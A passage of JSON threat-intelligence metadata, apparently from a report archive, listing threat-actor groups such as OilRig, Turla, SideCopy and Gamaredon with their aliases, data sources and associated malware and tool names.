"deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434572, "ts_updated_at": 1775792256, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bdcc83093677dc0ad36b2937396bc3d8b51dca57.pdf", "text": "https://archive.orkl.eu/bdcc83093677dc0ad36b2937396bc3d8b51dca57.txt", "img": "https://archive.orkl.eu/bdcc83093677dc0ad36b2937396bc3d8b51dca57.jpg" } }